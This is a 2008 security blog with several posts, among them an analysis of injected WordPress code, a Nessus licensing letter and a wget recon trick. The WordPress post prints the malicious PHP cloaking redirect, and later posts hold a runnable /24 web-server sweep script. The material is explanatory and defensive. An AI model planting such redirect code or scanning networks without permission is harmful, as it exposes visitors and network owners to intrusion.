Why you should RTFM: REXML
Sunday, June 22, 2008
Found this great little commentary while researching the write() method in REXML:
ie_hack: Internet Explorer is the worst piece of crap to have ever been written, with the possible exception of Windows itself. Since IE is unable to parse proper XML, we have to provide a hack to generate XML that IE's limited abilities can handle. This hack inserts a space before the /> on empty tags. Defaults to false.
Wordpress 2.5.0 and 2.5.1 vulnerable to attack
Sunday, June 8, 2008
Thanks to co-author Brandon Palmen for the heads up on a Wordpress hack in progress. The attackers are using a few obfuscation tricks to inject code into Wordpress installations through a recently announced vulnerability. More details in a well-written write-up here.
The code snippet below, taken from a digitalpoint.com forum thread, hides the redirect's true destination behind base64 encoding:
<?php
// Referer substrings the attacker treats as "this visitor came from a search engine"
$seref=array("google","msn",
"live","altavista","ask",
"yahoo","aol","cnn",
"weather","alexa");
$ser=0;
foreach($seref as $ref)
  if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false)
  { $ser="1"; break; }
// Redirect only search-engine visitors who present no cookies at all.
// "YW55cmVzdWx0cy5uZXQ=" decodes to anyresults.net
if($ser=="1" && sizeof($_COOKIE)==0)
{
  header("Location:http://" . base64_decode("YW55cmVzdWx0cy5uZXQ=") . "/");
  exit;
}
?>
This code shows yet another trend we've noticed at stopbadware.org: the injected code only acts on requests that arrive directly from a search engine, and here only when the visitor carries no cookies, which leaves the site's own logged-in users untouched. A site owner clicking through their own links or browsing while logged in never sees the redirect. We can only conclude this is to prevent (or delay) detection and maximize infection duration.
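An added shell example (mine, not code from the post or from the forum thread) that makes this kind of injection reviewable: it decodes every base64_decode("...") literal in a PHP file so the destination is visible in plain text, and it probes a live site the way the snippet's own trigger condition does, once with a search-engine referer and no cookies and once without a referer. It assumes POSIX sh with grep, sed, coreutils base64 and curl; the sample file is constructed from the snippet above and the URL argument is a placeholder.

```shell
#!/bin/sh
# Added example, not from the original post: decode hidden base64 literals
# and reproduce the snippet's "search-engine visitor, no cookies" request.
# Assumes POSIX sh, GNU/BSD grep (-o), sed, coreutils base64 (-d), curl.

# Write a constructed sample (a trimmed copy of the injected snippet) to $1.
make_sample() {
  cat > "$1" <<'EOF'
<?php
$ser=1;
if($ser=="1" && sizeof($_COOKIE)==0)
{
header("Location:http://" . base64_decode("YW55cmVzdWx0cy5uZXQ=") . "/");
exit;
}
?>
EOF
}

# Print the decoded value of every base64_decode("...") literal in file $1,
# one per line, so a reviewer sees the domain instead of a blob.
decode_b64_literals() {
  grep -o 'base64_decode("[A-Za-z0-9+/=]*")' "$1" \
    | sed 's/^base64_decode("\(.*\)")$/\1/' \
    | while IFS= read -r enc; do
        # base64 -d emits no trailing newline; add one per literal.
        printf '%s' "$enc" | base64 -d 2>/dev/null
        printf '\n'
      done
}

# Mimic the trigger: a Google referer and an empty cookie jar, then the same
# URL with no referer. A 302 on the first line only is the cloaking
# signature. Needs network access; $1 is the page to test.
probe_cloaking() {
  url="$1"
  curl -s -o /dev/null -w 'with referer: %{http_code} %{redirect_url}\n' \
       -e 'http://www.google.com/search?q=test' "$url"
  curl -s -o /dev/null -w 'no referer:   %{http_code} %{redirect_url}\n' "$url"
}
```

To sweep an install, run decode_b64_literals over every .php file under the document root and treat any decoded hostname you do not recognise as a finding; the curl probe then confirms whether the redirect is live. The %{redirect_url} write-out variable needs curl 7.18.2 or newer.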
Open Access: coming soon
Sunday, June 8, 2008
Peter Suber has written a great post that should be read by anyone interested in education, open source, or what is known as Open Access. In my younger days I listened to the mantra of hacker lore, “Information wants to be free” and so the ideals of Open Access are quite appealing. This mantra seems to have mutated for me and today I personally believe that “Knowledge wants to be free”. Peter points out that, “In the age of print, publishers could control access to research they did not conduct, write up, sponsor or purchase. One reason is that publishers controlled all the effective channels of distribution; but that has changed.”
Beansec June 2008
Sunday, June 8, 2008
Will be held at Middlesex Lounge in Central Square, Cambridge MA on June 18th, 2008. The Enormous Room is all booked up and so we are going to be at our backup location. We are considering making this a permanent move so come check it out.
Chinese hackers political assault on the blogosphere
Wednesday, June 4, 2008
Disturbing news of a hacked blogger in China. This is not a simple drive-by download (DBD) setup involving iframes. This was a highly targeted and politically motivated attack. The attackers not only posted a personal picture of her with instructions for viewers to assault her on the street but also managed to infiltrate her Skype account.
Tenable alters Nessus plug-in licensing. Still not Open
Thursday, May 15, 2008
Dear Nessus Community,

On behalf of Tenable Network Security, we would like to thank you for making Tenable's Nessus® vulnerability scanner the most widely used scanner in the world. Over the last five years, we have seen Nessus grow globally to over 5 million downloads and we have been there every step of the way. The core Nessus engine is powered by our world-class vulnerability research content which includes over 20,000 plugins, enhanced features such as IPv6 scanning, free mailing lists, online search tools and free clients. Nessus has become not only a popular tool for conducting security audits but we have extended its capabilities to conduct agent-less patch audits and configuration audits, as well as locating sensitive data. Looking forward, we plan to further increase functionality, such as SMBv2 support to better audit Windows 2008 and Windows Vista, and further expand our abilities to conduct even more comprehensive vulnerability and configuration audits.

In the process, the Nessus scanning engine has been provided to our rapidly growing community as a free download with research content licensed through two plugin subscriptions. Our Nessus users know these as the "Registered Feed" and the "Direct Feed" subscriptions. These subscriptions have been available for over three years and have been utilized by countless individuals, consultants, companies, governments and other organizations.

We continually interact with the Nessus community and review our capabilities to ensure Nessus continues to meet and exceed the needs of its users. Since creating and releasing the subscriptions, two distinct user groups emerged. They are the home user and the commercial user. To better reflect the needs of our community, we have decided to update our Subscription licensing policy and are announcing the planned change (as outlined below and accompanied by a FAQ) that will go into effect on July 31st, 2008.

First, we will continue to enable all users to download Nessus for free.

Second, due to computers and personal networks having become ubiquitous in homes around the world, Tenable will launch a "HomeFeed" with all Nessus vulnerability plugin updates for home users at no charge and with no delay. We are excited to offer the latest vulnerability checks for personal, non-commercial use and strongly encourage home users to audit their computers and networks for the newest security flaws.

Finally, Tenable's "Direct Feed" will be re-named to the "ProfessionalFeed" and the "Registered Feed" will be discontinued. The ProfessionalFeed will entitle subscribers to the latest vulnerability and patch audits, configuration and content audits and commercial support for their Nessus 3 installation. The ProfessionalFeed will serve as Tenable's commercial subscription and will be required for individuals and organizations that want to use Tenable's Nessus plugins commercially.

The decision to alter the licensing policy is the result of significant deliberation and will benefit both home users and commercial users. The change will ensure our ability to invest in the future roadmap for Nessus and to expand our research, support and training capabilities to serve our growing community. We realize this may affect some individuals, corporations and organizations that use the currently available "Registered Feed" in production audits and commercial services. Because of this, Tenable is offering a 25 percent rebate for the Direct Feed subscription service (normally available at $1200 per year), beginning May 14, 2008 until July 31, 2008 only when purchased through Tenable's e-commerce site.

Additionally, we understand that there are those in the Nessus community that serve broad social and educational objectives and we want to make certain that qualified charitable and information security teaching/training organizations have access to the ProfessionalFeed free of charge. To this end, Tenable will provide ProfessionalFeed subscriptions to charity and teaching/training organizations at no cost for those that qualify.

As always, Tenable will continue to perform the in-depth research, testing and development to keep Nessus the leading vulnerability and network auditing tool available to both home and professional users.

excerpt directly from Tenable Network Security, Inc.
running ubuntu on powerbooks
Saturday, May 10, 2008
ERROR: Your architecture, 'ppc', is not supported by the
Adobe Flash Player installer.
Why software protection broke my user experience
Wednesday, April 30, 2008
I use a professional VPN software on my Powerbook called VPN Tracker from equinux. I bought this software because I wanted a streamlined and pushbutton system for dealing with the ISAKMP VPN at work. Normally this software works quite well but because of the aging hardware in my Powerbook I’m suddenly without any access to my internal network.
Several bits of my laptop are broken and I had to bring my Powerbook to the repair center. Before I turned in my laptop I created a mirror of the drive using rsync. OS X lets a user boot from a FireWire drive and so with a "loaner" Powerbook from work I have a complete, albeit slow, clone of my original laptop. Thunderbird, Firefox, etc. all work the same and are configured exactly as they were. VPN Tracker, unfortunately, is not. The configuration is still intact; however, the software doesn't think it is licensed anymore. I imagine that this is due to some check made on my CPU, drive volume, etc. to verify that I'm not installing this on multiple computers or something similar. More interestingly, I can't get to my email server anymore because our workplace is very paranoid and requires VPN authentication for access.
I understand the need for software protection in this marketplace but at this time I can say that it has utterly failed me as an end user. Despite supporting the company with a purchase all I can do now is sit and wait for an answer to my email. I only hope they respond to the alternate address I provided them.
wget recon technique
Saturday, April 19, 2008
I was looking for a novel way to recon a network for web servers and came up with a command line combination involving wget and find. The first stage uses wget to download the index page of any server that responds. The second stage removes the zero-length files that wget leaves behind for every address that did not return a page.
WGET STAGE
If you are assigned to scout a network range from 192.168.1.1 to 192.168.1.255 you can use a for loop and wget to quickly download index pages. Obviously this technique could be adapted for larger ranges, but in this published form it is best suited to a single Class C.
for i in `seq 1 255`
do
wget -O 192.168.1.$i.html 192.168.1.$i &
done
Expanding the parameters of the wget command: -O writes the output to a file with a specific name. Without it we would have filename collisions all over the place and, more importantly, no idea which server a given page came from. The & puts the process into the background and acts as a cheap form of parallel tasking: all 255 requests launch at the same time. Since we are limiting ourselves to a Class C we won't worry about overloading the machine. Two limits to keep in mind: wget only talks plain HTTP to port 80 here, so HTTPS-only servers and servers on non-standard ports are missed, and a host that accepts the connection but never answers keeps its background job alive until wget's default read timeout expires.
ZERO LENGTH FILE STAGE
The resulting files will either contain HTML or have a zero length. Because -O creates the output file before the request is sent, a zero-length file appears for every address that produced no page: the host is down, it is alive but nothing listens on port 80, or it answered with an HTTP error, whose body wget discards by default. To clean these up we use the find command's -empty test to locate them.
for i in `find . -empty -exec ls {} \;`
do
rm $i
done
What is left is HTML saved under a filename that is the IP address where it was found.
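An added shell example (mine, not the post's own commands) that packages the two stages above as functions and adds what a practitioner wants on top: the sweep gets a per-request timeout and a single attempt so a silent host cannot stall the run, the cleanup deletes the empty files in one find invocation and reports how many results survive, and a summary step pulls the <title> out of each surviving page so the hit list is readable at a glance. It assumes POSIX sh with wget, find, grep, sed and tr; the network prefix argument is a placeholder.

```shell
#!/bin/sh
# Added example, not from the original post: the wget/find recon sweep as
# functions, with timeouts, one-step cleanup and a title summary.
# Assumes POSIX sh, wget, find (-maxdepth/-empty), grep -o, sed, tr.

# Stage 1: fetch the index page of every host in a /24.
# $1 is the first three octets, e.g. 192.168.1; results land in the
# current directory as <ip>.html. Needs network access.
sweep_c_class() {
  prefix="$1"
  # .0 and .255 are the network and broadcast addresses, so 1..254.
  for i in $(seq 1 254); do
    # --tries=1 and --timeout=5 stop a silent host from holding its job
    # open for wget's default 900 s; -q keeps 254 jobs from interleaving.
    wget -q --tries=1 --timeout=5 -O "$prefix.$i.html" "http://$prefix.$i/" &
  done
  wait
}

# Stage 2: delete zero-length result files in directory $1 and print the
# number of .html files that remain.
prune_empty() {
  dir="$1"
  find "$dir" -maxdepth 1 -type f -name '*.html' -empty -exec rm -f {} +
  find "$dir" -maxdepth 1 -type f -name '*.html' | wc -l | tr -d ' '
}

# Stage 3: print "<ip>: <title>" for every surviving page in directory $1.
# Pages without a <title> are reported as "(no title)".
summarize() {
  dir="$1"
  for f in "$dir"/*.html; do
    [ -f "$f" ] || continue
    ip=$(basename "$f" .html)
    # Join lines first so a title split across lines still matches.
    title=$(tr -d '\n\r' < "$f" \
              | grep -io '<title>[^<]*</title>' \
              | head -n 1 \
              | sed 's/<[^>]*>//g')
    printf '%s: %s\n' "$ip" "${title:-(no title)}"
  done
}
```

Typical use is sweep_c_class 192.168.1, then prune_empty . and summarize . in the results directory. If you only want the cleanup step as a one-liner, find . -maxdepth 1 -name '*.html' -empty -delete does the same job as the post's for loop without a shell round trip per file.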
